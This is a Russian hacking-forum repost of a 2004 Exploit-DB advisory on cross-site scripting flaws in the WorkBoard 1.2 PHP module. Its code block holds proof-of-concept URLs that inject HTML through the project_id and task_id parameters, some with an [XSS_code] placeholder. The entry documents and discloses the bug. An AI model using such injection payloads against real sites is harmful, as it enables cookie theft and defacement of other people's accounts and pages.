Exploit WorkBoard 1.2 - Multiple Cross-Site Scripting Vulnerabilities

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
25014
Проверка EDB
  1. Пройдено
Автор
LOSTMON
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
null
Дата публикации
2004-12-17
Код:
source: https://www.securityfocus.com/bid/12009/info

It is reported that WorkBoard is affected by various cross-site scripting vulnerabilities. These issues are due to a failure of the application to properly sanitize user-supplied URI input.

These issues could permit a remote attacker to create a malicious URI link that includes hostile HTML and script code. If this link were to be followed, the hostile code may be rendered in the web browser of the victim user. This would occur in the security context of the affected Web site and may allow for theft of cookie-based authentication credentials or other attacks. 

http://www.example.com/modules.php?name=WorkBoard&file=project&project_id=3[XSS_code]

http://www.example.com/modules.php?name=WorkBoard&file=project&project_id=
2%3Cbody%3E%3Cp%3E%3Ch1%3EWorkboard+XSS%20Pow@!!+%21%21%21+lostmon+was+here+%3AD%3C/h1%3E

http://www.example.com/modules.php?name=Work_Board&op=Task&task_id=7[XSS_code]

http://www.example.com/modules.php?name=Work_Board&op=Task&task_id=
5%3Cbody%3E%3Cp%3E%3Ch1%3EWorkboard+XSS%20Pow@!!+%21%21%21+lostmon+was+here+%3AD%3C/h1%3E
 
Источник
www.exploit-db.com

Похожие темы